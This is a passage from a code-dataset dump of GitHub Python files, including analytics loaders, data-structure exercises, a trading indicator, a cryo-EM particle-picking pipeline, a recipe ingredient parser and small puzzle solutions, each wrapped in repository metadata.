cur.execute('''CREATE TABLE IF NOT EXISTS DATA(\n Date TIMESTAMP NOT NULL,\n sessions INTEGER,\n screenPageViews INTEGER,\n eventCount INTEGER,\n userEngagementDuration INTEGER)''')\n\n print(\"Table created\")\n\n # Copy data from CSV\n sql2 = f'''COPY DATA(Date, Sessions, ScreenPageviews, EventCount, UserEngagementDuration)\n FROM '{path}'\n DELIMITER ','\n CSV HEADER;'''\n\n cur.execute(sql2)\n conn.commit()\n cur.close()\n conn.close()\n\nprint(filename)\nsample_run_report(property_id)\ntable(filename)\n","repo_name":"KHemanth2001/google-analytics","sub_path":"GA_postgres.py","file_name":"GA_postgres.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
+{"seq_id":"37577560342","text":"class Node:\r\n def __init__(self,data):\r\n self.data = data\r\n self.next = None\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n \r\n#Add node at begining\r\n def pushAtBeg(self,new_data):\r\n new_node = Node(new_data)\r\n new_node.next = self.head\r\n self.head = new_node\r\n\r\n#Add node after a given node\r\n def pushAfter(self,prev_node , new_data):\r\n if(prev_node is None):\r\n print(\"Given Previous node must be in list\")\r\n return\r\n new_node = Node(new_data)\r\n new_node.next = prev_node.next\r\n prev_node.next = new_node\r\n\r\n#Add node at end\r\n def pushAtEnd(self, new_data):\r\n new_node = Node(new_data)\r\n #if ll is empty, make newnode as \r\n if(self.head is None):\r\n self.head = new_node\r\n return\r\n #else traverse till last node\r\n last = self.head\r\n while(last.next):\r\n last = last.next\r\n #change the next of last node\r\n last.next = new_node\r\n\r\n def printList(self):\r\n temp = self.head\r\n while(temp):\r\n print(temp.data, end = \" \")\r\n temp = temp.next\r\n\r\nif __name__ == \"__main__\":\r\n l = LinkedList()\r\n l.pushAtBeg(5)\r\n l.pushAtBeg(4)\r\n l.pushAfter(l.head,6)\r\n l.pushAtEnd(7)\r\n l.pushAfter(l.head.next , 0)\r\n print(\"Linked List :\")\r\n l.printList()\r\n \r\n \r\n","repo_name":"Vaishnavi2707/DSAlgo","sub_path":"linkedlist/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18628958163","text":"from typing import List\nfrom market_data.bar import Bar\nfrom indicators.sma import SMA\n\n\nclass VWAP:\n \"\"\"\n Volume Weighted Average Price (VWAP) indicator.\n \"\"\"\n\n def __init__(self, window: int) -> None:\n \"\"\"\n Constructor for the VWAP indicator.\n\n Parameters:\n window (int): The number of bars to use in the calculation.\n \"\"\"\n self.window = window\n self.sma = SMA(window)\n\n def calculate(self, bars: List[Bar]) -> float:\n \"\"\"\n Calculates the VWAP for the given bars.\n\n Parameters:\n bars (List[Bar]): A list of bars.\n\n Returns:\n float: The VWAP value.\n \"\"\"\n typical_prices = [(bar.high + bar.low + bar.close) / 3 for bar in bars]\n volumes = [bar.volume for bar in bars]\n\n # Calculate the typical price * volume values\n tpv_values = [tp * vol for tp, vol in zip(typical_prices, volumes)]\n\n # Calculate the cumulative sum of the typical price * volume values and volumes\n tpv_cumulative_sum = [sum(tpv_values[:i+1]) for i in range(len(tpv_values))]\n volume_cumulative_sum = [sum(volumes[:i+1]) for i in range(len(volumes))]\n\n # Calculate the VWAP using the SMA\n vwap = self.sma.calculate(tpv_cumulative_sum, volume_cumulative_sum)\n\n return vwap\n","repo_name":"spacewink9/Spacewink-Terminal-","sub_path":"indicators/vwap.py","file_name":"vwap.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"7025045884","text":"from pathlib import Path\nimport warnings\nfrom sys import exit, argv\nimport numpy as np\nfrom .kltpicker import KLTPicker\nfrom .util import trig_interpolation\nfrom .kltpicker_input import parse_args, get_args, progress_bar, check_num_finished, check_for_newer_version, check_output_dir\nimport mrcfile\nfrom .micrograph import Micrograph\nfrom .cryo_utils import downsample, downsample_gpu\nimport multiprocessing as mp\nimport os\nimport time\nwarnings.filterwarnings(\"ignore\")\n\n# Check if 
CuPy is installed and we have GPU devices\ntry:\n import cupy as cp\n cp.cuda.runtime.getDeviceCount()\n HAS_CUPY = 1\nexcept:\n HAS_CUPY = 0\n\ndef process_micrograph(micrograph, picker):\n micrograph.cutoff_filter(picker.patch_size)\n micrograph.estimate_rpsd(picker.patch_size, picker.max_iter, picker.no_gpu)\n micrograph.approx_noise_psd = micrograph.approx_noise_psd + np.median(micrograph.approx_noise_psd) / 10\n micrograph.prewhiten_micrograph(picker.no_gpu)\n micrograph.estimate_rpsd(picker.patch_size, picker.max_iter, picker.no_gpu) \n micrograph.psd = np.abs(trig_interpolation(np.pi * micrograph.r.astype('float64'), micrograph.approx_clean_psd,\n picker.rho.astype('float64')))\n micrograph.construct_klt_templates(picker)\n num_picked_particles, num_picked_noise = micrograph.detect_particles(picker)\n return [micrograph.mrc_name, num_picked_particles, num_picked_noise]\n\ndef get_micrograph(mrc_file, mgscale, no_gpu):\n \"\"\"Reads an mrc file and downsamples it.\"\"\"\n mrc = mrcfile.open(mrc_file, permissive=True)\n mrc_data = mrc.data.astype('float64').transpose()\n mrc.close()\n mrc_size = mrc_data.shape\n mrc_data = np.rot90(mrc_data)\n if no_gpu:\n mrc_data = downsample(mrc_data, (np.floor(np.multiply(mgscale, mrc_size))).astype(int))\n else:\n mrc_data = downsample_gpu(cp.asarray(mrc_data), (np.floor(np.multiply(mgscale, mrc_size))).astype(int))\n if np.mod(mrc_data.shape[0], 2) == 0: # Odd size is needed.\n mrc_data = mrc_data[0:-1, :]\n if np.mod(mrc_data.shape[1], 2) == 0: # Odd size is needed.\n mrc_data = mrc_data[:, 0:-1]\n mrc_data = mrc_data - np.mean(mrc_data.transpose().flatten())\n mrc_data = mrc_data / np.linalg.norm(mrc_data, 'fro')\n mc_size = mrc_data.shape\n micrograph = Micrograph(mrc_data, mc_size, mrc_file.name, mrc_size)\n return micrograph\n\ndef get_mempool_usage(param, gpu_index):\n \"\"\"\n Calculate how much memory is used in the GPU by a single process on one mrc.\n\n \"\"\"\n with cp.cuda.Device(gpu_index): \n mrc_file = param[0]\n picker = param[1]\n start = cp.cuda.runtime.memGetInfo()[0]\n micrograph = get_micrograph(mrc_file, picker.mgscale, picker.no_gpu)\n process_micrograph(micrograph, picker)\n finish = cp.cuda.runtime.memGetInfo()[0]\n mem_usage = (start-finish)*1.2\n return mem_usage\n\ndef calc_procs_per_gpu(mem_usage, max_processes, gpu_indices):\n \"\"\"\n Find how many available GPUs there are, and for each available GPU compute\n the maximal number of processes that can use it (based on memory usage).\n \"\"\"\n num_available_cpus = min(mp.cpu_count(), max_processes)\n procs_per_gpu = {}\n for gpu_index in gpu_indices:\n if sum(procs_per_gpu.values()) < num_available_cpus:\n cp.cuda.runtime.setDevice(gpu_index)\t\n free_mem = cp.cuda.runtime.memGetInfo()[0]\n procs_per_gpu[gpu_index] = min(np.floor(free_mem/mem_usage), num_available_cpus - sum(procs_per_gpu.values()))\n else:\n procs_per_gpu[gpu_index] = 0\n return procs_per_gpu\n\n \ndef multi_process_micrograph_gpu(param):\n \"\"\"\n Process micrographs in parallel, using GPU.\n \"\"\"\n # Unpack parameters (pool.map can map only one argument per function call).\n mrc_file = param[0]\n picker = param[1]\n gpu_index = param[2]\n with cp.cuda.Device(gpu_index):\n micrograph = get_micrograph(mrc_file, picker.mgscale, picker.no_gpu)\n summary = process_micrograph(micrograph, picker)\n if picker.verbose: # User requested detailed output.\n num_finished = check_num_finished(picker.output_particles / 'star', picker.start_time)\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - 
picker.start_time)) + \" - Picked %d particles and %d noise images out of %s. (%3d%s)\" %(summary[1], summary[2], summary[0], round(num_finished/picker.num_mrcs*100), \"%\"))\n return summary\n \ndef multi_process_micrograph(param):\n \"\"\"\n Process micrographs in parallel, no GPU.\n \"\"\"\n # Unpack parameters (pool.map can map only one argument per function call).\n mrc_file = param[0]\n picker = param[1]\n micrograph = get_micrograph(mrc_file, picker.mgscale, picker.no_gpu)\n summary = process_micrograph(micrograph, picker)\n if picker.verbose: # User requested detailed output.\n num_finished = check_num_finished(picker.output_particles / 'star', picker.start_time)\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - picker.start_time)) + \" - Picked %d particles and %d noise images out of %s. (%3d%s)\" %(summary[1], summary[2], summary[0], round(num_finished/picker.num_mrcs*100), \"%\"))\n return summary\n\n \ndef multi_process_micrograph_pool(gpu_index, num_procs, batch, shared_list):\n \"\"\"\n A wrapper function that allows processing many micrographs in parallel using\n a worker pool.\n For each GPU, this function is called in a new process. This process runs\n a pool of workers of size num_procs, all using the same GPU. \n \"\"\"\n for b in batch:\n b.append(gpu_index)\n with mp.Pool(processes=int(num_procs)) as pool:\n shared_list += [x for x in pool.imap_unordered(multi_process_micrograph_gpu, batch, chunksize=7)]\n\ndef get_mrc_batches(params, cpus_per_gpu):\n \"\"\"\n Split the mrc files into batches proportionally sized to the number of\n processes to be run using each GPU.\n \"\"\"\n batches = {}\n gpus = sorted(list(cpus_per_gpu.keys()))\n cpus = np.array([cpus_per_gpu[gpu] for gpu in gpus])\n batch_sizes = np.ceil(len(params) * cpus / np.sum(cpus))\n indices = np.zeros(len(batch_sizes) + 1).astype(int)\n indices[1:] = np.cumsum(batch_sizes).astype(\"int\")\n param_batches = [params[indices[i]:indices[i+1]] for i in range(len(indices)-1)]\n for i in range(len(param_batches)):\n batches[gpus[i]] = param_batches[i]\n return batches\n \ndef main():\n try:\n check_for_newer_version()\n except:\n pass\n # Because of CUDA limitations, it is impossible to fork processes after \n # invoking CUDA. So we need to use 'spawn' start method instead.\n mp.set_start_method('spawn', force=True)\n \n # Get user arguments:\n user_input = argv\n if len(user_input) > 1: # User entered arguments. Use command line mode.\n args = parse_args(HAS_CUPY)\n # Check if user entered the mandatory arguments: input and output \n # directory and particle size. If not, exit.\n if args.output_dir is None or args.input_dir is None or args.particle_size is None:\n print(\"Error: one or more of the following arguments are missing: input-dir, output-dir, particle-size. For help run kltpicker -h\")\n exit()\n else:\n num_finished_output = check_output_dir(Path(args.input_dir), Path(args.output_dir), args.particle_size)\n if num_finished_output == 2:\n print(\"The output directory contains coordinate files for all of the micrographs in the input directory. Aborting...\")\n exit()\n elif num_finished_output == 1:\n pass\n elif num_finished_output == 0:\n print(\"Could not find any .mrc files in %s. \\nExiting...\" % args.input_dir)\n exit(0) \n else:\n if not args.only_do_unfinished:\n print(\"The output directory contains coordinate files for some of the micrographs in the input directory. Use --do-unfinished-only if needed. 
Aborting...\")\n exit()\n\n else: # User didn't enter arguments, use interactive mode to get arguments.\n args = parse_args(HAS_CUPY) # Initiate args with default values.\n args.input_dir, args.output_dir, args.particle_size, args.num_particles, args.num_noise, args.no_gpu, args.gpus, args.verbose, args.max_processes, args.only_do_unfinished = get_args(HAS_CUPY)\n \n # Handle user options: \n # If max_processes limit not set, set it to infinity.\n if args.max_processes == -1:\n args.max_processes = np.inf\n \n # Find number of .mrc files in input directory. \n # Check if output directory already contains any output coordinate files \n # for the micrographs in the input directory. If so, remove these \n # micrographs from the micrographs to be processed.\n \n mrc_files = check_output_dir(Path(args.input_dir), Path(args.output_dir), args.particle_size)\n if mrc_files == 1: # Need to process all the micrographs in the input dir. \n mrc_files = list(Path(args.input_dir).glob(\"*.mrc\"))\n print(\"\\nRunning on %i files.\" % len(mrc_files))\n \n if not args.no_gpu:\n print(\"Using GPUs %s.\"%(\", \".join([str(x) for x in args.gpus])))\n if not Path(args.output_dir).exists(): # If the output directory doesn't exist, create it.\n Path.mkdir(args.output_dir)\n \n picker = KLTPicker(args) # Initiate picker object.\n picker.num_mrcs = len(mrc_files)\n \n \n # Preprocessing. If using GPU, preprocessing includes the calculation of \n # memory that is taken up in the processing of a single micrograph in the\n # GPU.\n print(\"Preprocessing (usually takes up to 1 minute)...\")\n picker.preprocess()\n params = [[mrc_file, picker] for mrc_file in mrc_files]\n \n if args.no_gpu: # GPU is disabled by user/not available on system.\n print(\"Preprocess finished. Picking particles...\")\n os.environ[\"NUMBA_DISABLE_CUDA\"] = \"1\" # Disable use of CUDA by NUMBA.\n if not picker.verbose: # Display simple progress bar.\n p = mp.Process(target=progress_bar, args=[picker.output_particles / \"star\", len(mrc_files)], name=\"KLTPicker_ProgressBar\")\n p.start() \n # Pick particles. The number of concurrent processes is the minimum of\n # the limit set by the user and two less than the number of CPUs on the machine.\n with mp.Pool(processes=min(args.max_processes, mp.cpu_count() - 2)) as pool:\n # imap creates an iterator so we don't exhaust the machine's memory\n # (as opposed to map). imap_unordered is slightly faster than imap.\n res = [x for x in pool.imap_unordered(multi_process_micrograph, params)] \n\n else: # Using GPU.\n # Calculate the memory usage of the GPU by a single process on one micrograph.\n mem_usage = get_mempool_usage(params[0], args.gpus[0]) \n print(\"Preprocess finished. Picking particles...\")\n \n # Calculate the number of processes to run on each GPU, and partition\n # the micrographs into batches to be passed to each GPU.\n procs_per_gpu = calc_procs_per_gpu(mem_usage, args.max_processes, args.gpus)\n batches = get_mrc_batches(params, procs_per_gpu)\n if not picker.verbose: # Display simple progress bar.\n p = mp.Process(target=progress_bar, args=[picker.output_particles / \"star\", len(mrc_files)], name=\"KLTPicker_ProgressBar\")\n p.start()\n # We have multiple processes writing results to the same \"res\" object,\n # so we need a manager (in the version without GPU the pool function\n # takes care of this).\n manager = mp.Manager()\n res = manager.list()\n # Distribute the batches of micrographs to different processes. Each\n # process runs a pool of workers on its own GPU. 
The size of each \n # worker pool is according to procs_per_gpu.\n jobs = []\n for i in procs_per_gpu:\n if procs_per_gpu[i]:\n p = mp.Process(target=multi_process_micrograph_pool, args=[i, int(procs_per_gpu[i]), batches[i], res], name=\"KLTPicker%d\"%i)\n jobs.append(p)\n p.start() \n for proc in jobs:\n proc.join()\n \n # Write summary file and print summary to user.\n num_files = len(res)\n num_particles = sum([row[1] for row in res])\n num_noise = sum([row[2] for row in res]) \n print(\"Picked %d particles and %d noise images out of %d micrographs.\" %(num_particles, num_noise, num_files))\n","repo_name":"ShkolniskyLab/kltpicker","sub_path":"kltpicker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12607,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"33620368595","text":"from pyramid.view import view_config\nimport logging\nimport json\n\nlog = logging.getLogger(__name__)\n\nfrom wheres_the_beer.lib import config\n\n@view_config(route_name='home', renderer='templates/index.pt')\ndef my_view(request):\n google_maps_key = config.get('google_maps_key')\n return {'google_maps_key': google_maps_key}\n\n@view_config(route_name='old_data', renderer='json')\ndef old_data_view(request):\n when = request.params.get('when')\n if when == 'friday':\n filename = 'wheres_the_beer/static/friday.json'\n elif when == 'weekend':\n filename = 'wheres_the_beer/static/weekend.json'\n elif when == 'today':\n filename = 'wheres_the_beer/static/data.json'\n else:\n return {'data': []}\n the_file = open(filename, 'r')\n data = []\n for line in the_file:\n data.append(json.loads(line))\n the_file.close()\n\n return {'data': data}\n","repo_name":"seanpmcb/wheres_the_beer","sub_path":"wheres_the_beer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71402082970","text":"def find_a(n, sum):\n global ans\n if sum > K:\n return\n\n if n == N:\n if sum == K:\n ans += 1\n return\n\n visit[n] = 0\n find_a(n+1, sum)\n\n visit[n] = 1\n sum += arr[n]\n find_a(n+1, sum)\n\n\n\nT = int(input())\nfor t in range(1, T+1):\n N, K = map(int,input().split())\n arr = list(map(int,input().split()))\n visit = [0] * (N)\n ans = 0\n find_a(0, 0)\n\n print(f'#{t}',ans)","repo_name":"TutiTuti/coding-algorithm","sub_path":"20230829_s2817_부분수열의합_D3.py","file_name":"20230829_s2817_부분수열의합_D3.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70287913691","text":"import tensorflow as tf\nfrom tensorflow.contrib import slim\n\nfrom register import backbone_dict\nfrom register import header_dict\nfrom register import loss_dict\nfrom register import nms_dict\nfrom register import anchor_dict\n\ndef forward(ROOT_CFG, num_classes, inputs_image, is_training, backbone_name='SSD', header_name='SSD'):\n if backbone_name not in backbone_dict or header_name not in header_dict:\n return 0\n\n network_cfg = ROOT_CFG.get('network', {})\n backbone_cfg = ROOT_CFG.get('backbone', {})\n header_cfg = ROOT_CFG.get('header', {})\n anchors_cfg = ROOT_CFG.get('anchors', {})\n anchor_func = anchor_dict[ROOT_CFG[\"anchors\"].get('type', 'default')]\n\n print(\"---------start construct backbone---------\")\n with slim.arg_scope(backbone_dict[backbone_name].arg_scope(network_cfg)):\n end_points = backbone_dict[backbone_name].backbone(inputs_image, 
backbone_cfg, network_cfg, is_training)\n print(\"---------success construct backbone---------\")\n\n print(\"---------start construct header---------\")\n with slim.arg_scope(header_dict[header_name].arg_scope(network_cfg)):\n result = header_dict[header_name].header(end_points, num_classes, header_cfg, network_cfg, [anchors_cfg, anchor_func], is_training)\n print(\"---------success construct header---------\")\n \n return result\n\ndef losses(ROOT_CFG, model_outputs, placeholders, loss_name='normal'):\n if loss_name not in loss_dict:\n return 0\n assert placeholders[2].dtype == tf.int32\n assert placeholders[3].dtype == tf.float32\n assert placeholders[4].dtype == tf.int8\n\n losses_cfg = ROOT_CFG.get('losses', {})\n background_label = ROOT_CFG.get('background_label', 0)\n\n print(\"---------start construct losses---------\")\n r = loss_dict[loss_name].losses(model_outputs[0],\n model_outputs[1],\n model_outputs[2],\n placeholders[2],\n placeholders[3],\n placeholders[4],\n background_label,\n losses_cfg)\n print(\"---------success construct header---------\")\n return r\n\ndef losses_description(loss_name='normal'):\n if loss_name not in loss_dict:\n return 0\n return loss_dict[loss_name].losses_description()\n\ndef postprocessing(ROOT_CFG, num_classes, anchors, model_outputs, postprocessing_name='nms'):\n if postprocessing_name not in nms_dict:\n return 0\n\n background_label = ROOT_CFG.get('background_label', 0)\n postprocessing_cfg = ROOT_CFG.get('postprocessing', {})\n anchors_cfg = ROOT_CFG.get('anchors', {})\n\n print(\"---------start construct postprocessing---------\")\n r = nms_dict[postprocessing_name].postprocessing(model_outputs,\n num_classes,\n anchors,\n background_label,\n postprocessing_cfg,\n anchors_cfg)\n print(\"---------success construct postprocessing---------\") \n return r","repo_name":"lyxzzz/PWSConv_backup","sub_path":"detection_for_voc/python/model_loader.py","file_name":"model_loader.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21510155195","text":"import nltk\nimport logging\nimport regex as re\nfrom pint import UnitRegistry\n\nnltk.download(\"stopwords\", quiet=True)\n\n\nlogger = logging.getLogger(\"recipedex.ingredient\")\n\nMANUAL_UNITS = \"|\".join([\n \"pinch\",\n \"envelope\",\n \"dash\",\n \"can\",\n \"whole\",\n \"head\",\n \"clove\",\n \"bunch\",\n \"handful\",\n \"piece\",\n \"strip\",\n \"splash\",\n \"stick\"\n])\nSTOP_WORDS = nltk.corpus.stopwords.words('english') + [\n \"small\",\n \"medium\",\n \"large\"\n]\nUREG = UnitRegistry()\n\n\nclass Ingredient(dict):\n\n def __init__(self, value: str):\n '''\n Initialise an Ingredient object by parsing the value string\n\n Parameters:\n value: String version of ingredients\n Returns:\n None\n '''\n super(Ingredient, self).__init__(name=\"\", unit=\"\", quantity=\"\", comment=\"\", optional=False)\n\n # Search for optional text and remove from string\n self[\"optional\"] = \"option\" in value\n value = re.sub(r\"(\\S*option\\S*)\", \"\", value)\n\n # Find comment and remove from string\n self[\"comment\"] = \", \".join(\n re.sub(r\"(\\(|\\)|^,\\s*)\", \"\", i)\n for i in re.findall(r\"(, (?:.+)|\\((?:.+)\\)|(?:or .+))\", value)\n )\n value = re.sub(r\"(, .+)|(\\(.*\\))|(or .*)\", \"\", value)\n\n # Find qunatity and unit by\n try:\n # Quantity followed by unit\n self[\"quantity\"], self[\"unit\"] = re.search(r\"(\\d\\s*x\\s*\\d+|\\d*\\.\\d+|\\d+) ?(\\w+)\", value).groups()\n value = 
re.sub(r\"(\\d\\s*x\\s*\\d+|\\d*\\.\\d+|\\d+) ?(\\w+)\", \"\", value)\n except: # noqa: E722\n try:\n # Manual unit with no number\n self[\"quantity\"], self[\"unit\"] = \"1\", re.search(r\"(\" + MANUAL_UNITS + r\")\\w*\\s\", value).group(1)\n value = re.sub(r\"(\" + MANUAL_UNITS + r\")\\w*\\s\", \"\", value)\n except: # noqa: E722\n try:\n # Check comment contains number\n self[\"quantity\"], self[\"unit\"] = re.search(\n r\"(\\d\\s*x\\s*\\d+|\\d*\\.\\d+|\\d+) ?(\\w+)\", self[\"comment\"]\n ).groups()\n self[\"comment\"] = re.sub(\n r\"(, )?(\" + self[\"quantity\"] + r\") ?(\" + self[\"unit\"] + r\")(, )?\", \"\", self[\"comment\"]\n )\n except: # noqa: E722\n self[\"quantity\"], self[\"unit\"] = \"\", \"\"\n\n # Crop quantity decimals that are longer than two\n self[\"quantity\"] = re.sub(\n r\"(\\d+\\.\\d{3,})\", lambda q: re.search(r\"(\\d+\\.\\d{0,2})\", q.group()).group(), self[\"quantity\"]\n )\n\n # Parse rest of ingredient\n value = value.strip()\n if len(value) > 0:\n # Unique case where string contains \"to taste\"\n if \"to taste\" in value and len(self[\"unit\"]) == 0:\n self[\"name\"] = re.sub(r\"(\\s?to taste)\", \"\", value)\n self[\"unit\"] = \"to taste\"\n # Else, remove stop words, numbers, and punctuation\n else:\n self[\"name\"] = \" \".join([\n i for i in re.findall(r\"([^\\W\\d_]+)\", value, re.UNICODE) if i not in STOP_WORDS\n ])\n else:\n # Unit must actually be the name (e.g. 2 eggs)\n self[\"name\"], self[\"unit\"] = self[\"unit\"], \"count\"\n\n # Final operations on class variables\n self[\"name\"] = self[\"name\"].lower().capitalize()\n self[\"comment\"] = self[\"comment\"].lower()\n\n def to_unit(self, unit: str):\n '''\n Convert to the new unit, updating the quantity if necessary\n\n Parameters:\n unit: name of the unit to convert to\n\n Returns:\n None\n '''\n try:\n # Parse current ingredient using Pint package\n quantity = UREG.Quantity(float(self[\"quantity\"]), self[\"unit\"])\n\n # Assert new unit can convert from old unit\n assert quantity.check(unit), f\"Cannot convert from '{str(quantity.units)}' to '{unit}'.\"\n quantity = quantity.to(unit)\n\n # Update this object's variables\n self[\"quantity\"] = str(round(quantity.magnitude, 2))\n self[\"unit\"] = str(quantity.units)\n except: # noqa: E722\n logger.warning(f\"Could not convert unit '{self['unit']}' to unit '{unit}'.\")\n\n return self\n\n def to_system(self, system: str):\n '''\n Convert to the new unit system, updating the quantity if necessary\n\n Parameters:\n system: name of the unit system to convert to\n\n Returns:\n None\n '''\n try:\n # Set new default unit system using pint package\n UREG.default_system = system\n\n # Convert this ingredient to the new system\n quantity = UREG.Quantity(float(self[\"quantity\"]), self[\"unit\"])\n quantity = quantity.to_base_units().to_reduced_units()\n\n # Update this object's variables\n self[\"quantity\"] = str(round(quantity.magnitude, 2))\n self[\"unit\"] = str(quantity.units)\n except: # noqa: E722\n logger.warning(f\"Could not convert unit '{self['unit']}' to unit system '{system}'.\")\n\n return self\n\n def to_scale(self, scale: float):\n '''\n Adjust quantity to the new scale, updating the unit if necessary\n\n Parameters:\n scale: amount to scale the quantity by\n\n Returns:\n None\n '''\n # Scale this ingredient and update this object's variables\n self[\"quantity\"] = str(round(float(self[\"quantity\"]) * scale, 2))\n\n return self\n\n def extract_tags(self):\n '''\n Extract the tags from the properties of this ingredient\n\n Parameters:\n 
None\n\n Returns:\n tags: List of keywords from properties\n '''\n # Extract each word in the name field\n tags = [n.lower() for n in self[\"name\"].split()]\n\n # Remove stop words that appear in the tags list\n def is_readable(tag):\n return not tag.isnumeric() and tag not in nltk.corpus.stopwords.words(\"english\")\n tags = list(filter(is_readable, tags))\n\n return tags\n","repo_name":"edgorman/RecipeDex","sub_path":"recipedex/ingredient.py","file_name":"ingredient.py","file_ext":"py","file_size_in_byte":6292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16465754218","text":"\nfrom collections import Counter\n\n\ndef get_floor_p1(data_str):\n count = Counter(data_str)\n data_dict = dict(count.items())\n return data_dict['('] - data_dict[')']\n\n\ndef get_pos_p2(data_str):\n count = 0\n for idx, chr in enumerate(data_str):\n if chr == '(':\n count += 1\n else:\n count -= 1\n if count == -1:\n return idx + 1\n\n\nwith open('input.in') as f:\n data = f.read()\n print(\"Part 1: {}\".format(get_floor_p1(data)))\n print(\"Part 2: {}\".format(get_pos_p2(data)))\n","repo_name":"DawoudSheraz/advent-of-code-2015","sub_path":"Day 1/day_1.py","file_name":"day_1.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10787699620","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\n'''\nhttps://www.hackerrank.com/challenges/find-angle/problem?isFullScreen=true\n'''\nimport math\n\nif __name__ == \"__main__\":\n AB = int(input())\n BC = int(input())\n #find the diagonal\n AC = math.sqrt((AB ** 2) + (BC ** 2))\n MC = AC / 2\n #find half length of diagonal\n '''use the sine rule to find angle MCB\n degrees are first converted into radians'''\n MCB = AB * math.sin(math.radians(90)) / AC\n MCB = math.asin(MCB) * 180 * 7 / 22\n # use cosine rule to find length MB\n MB = (MC ** 2 + BC ** 2) - (2 * MC * BC * math.cos(math.radians(MCB)))\n MB = math.sqrt(MB)\n # find angle MBC using sine rule\n MBC = (MC * math.sin(math.radians(MCB))) / MB\n MBC = math.asin(MBC) * 180 * 7 / 22\n # round off to nearest integer\n MBC = round(MBC)\n # the character unicode for degrees is 176\n print(f'{MBC}{chr(176)}')","repo_name":"Mach-web/HackerRank","sub_path":"find_angle_MBC.py","file_name":"find_angle_MBC.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33323344088","text":"from collections import defaultdict\n\nclass MyQuery:\n query = \"\"\n result = []\n columns = []\n\n def __init__(self, command):\n self.query = command\n\n def run(self, cnx):\n cursor = cnx.cursor()\n cursor.execute(self.query)\n self.columns = [desc[0] for desc in cursor.description]\n self.result = cursor.fetchall()\n cursor.close()\n\n def getQuery(self):\n return self.query\n\n def getColumns(self):\n return self.columns\n\n def getResult(self):\n return self.result\n\n #Use a string to pass multiple indices for the key\n def getDataMap(self, keys):\n\n #parse keysString into an array of indices\n keyIndexList = keys.split(',')\n\n # creating a dict of dicts\n datamap = dict()\n c = 0\n for column in self.columns:\n col = column.lower()\n datamap[col] = dict()\n for row in self.result:\n # values = row.split(',')\n values = row\n key = self.getCompositeKey(keyIndexList,values)\n value = values[c]\n datamap[col][key] = value\n c += 1\n return datamap\n\n 
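# Editor's note (illustrative usage sketch; the query text, connection object and
# column/key choices below are hypothetical, not taken from this record):
#
#     q = MyQuery("SELECT country, city, population FROM cities")
#     q.run(cnx)                      # cnx: an open DB-API connection
#     m = q.getMap(0, 1)              # composite key = columns 0 and 1 concatenated
#     m['population']['USAustin']     # -> population value for ('US', 'Austin')
#
# getDataMap builds the same mapping but takes the key indices as a
# comma-separated string, e.g. q.getDataMap("0,1").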
#Use arbitrary arguments list to pass multiple indices for the key\n def getMap(self, *keyIndexList):\n # creating a dict of dicts\n datamap = dict()\n c = 0\n for column in self.columns:\n col = column.lower()\n datamap[col] = dict()\n for row in self.result:\n values = row\n key = self.getCompositeKey(keyIndexList, values)\n value = values[c]\n datamap[col][key] = value\n c += 1\n return datamap\n\n def getCompositeKey(self, keys, values):\n key = \"\"\n for i in keys:\n v = values[int(i)]\n if v is None: v = \"\"\n key = key + v\n return key\n","repo_name":"uridanan/MyDataReader","sub_path":"MyQuery.py","file_name":"MyQuery.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21120667590","text":"import pymongo\n\nclient = pymongo.MongoClient('mongodb://localhost:27017/')\ndatabase = client[\"film\"]\nsource = database['movie_with_rate']\ndes = database['movie_with_rate_small']\nsource.drop()\n\ncasts = {}\ndirectors = {}\ntypes = {}\neditors = {}\nmovies = []\nfor m in source.find({}).sort([('_id', 1)]):\n if m['casts'] != [] and m['directors'] != [] and m['types'] != '' and m['editors'] != []:\n movies.append(m)\n for c in m['casts']:\n casts[c] = casts.get(c, 0) + 1\n for t in m['types']:\n types[t] = types.get(t, 0) + 1\n for e in m['editors']:\n editors[e] = editors.get(e, 0) + 1\n for d in m['directors']:\n directors[d] = directors.get(d, 0) + 1\n\ncasts_filter = {k: v for k, v in casts.items() if v > 3}\ndirectors_filter = {k: v for k, v in directors.items() if v > 3}\ntypes_filter = {k: v for k, v in types.items() if v > 3}\neditors_filter = {k: v for k, v in editors.items() if v > 3}\n\nprint(len(casts_filter))\nprint(len(directors_filter))\nprint(len(types_filter))\nprint(len(editors_filter))\n\n\ndef fill_list(l, dic):\n res = []\n for li in l:\n if li in dic.keys():\n res.append(li)\n return res\n\n\nfor m in movies:\n ca = fill_list(m['casts'], casts_filter)\n if not ca:\n continue\n\n di = fill_list(m['directors'], directors_filter)\n if not di:\n continue\n\n ty = fill_list(m['types'], types_filter)\n if not ty:\n continue\n\n ed = fill_list(m['editors'], casts_filter)\n if not ed:\n continue\n\n m['casts'] = ca\n m['directors'] = di\n m['types'] = ty\n m['editors'] = ed\n del m['_id']\n\n 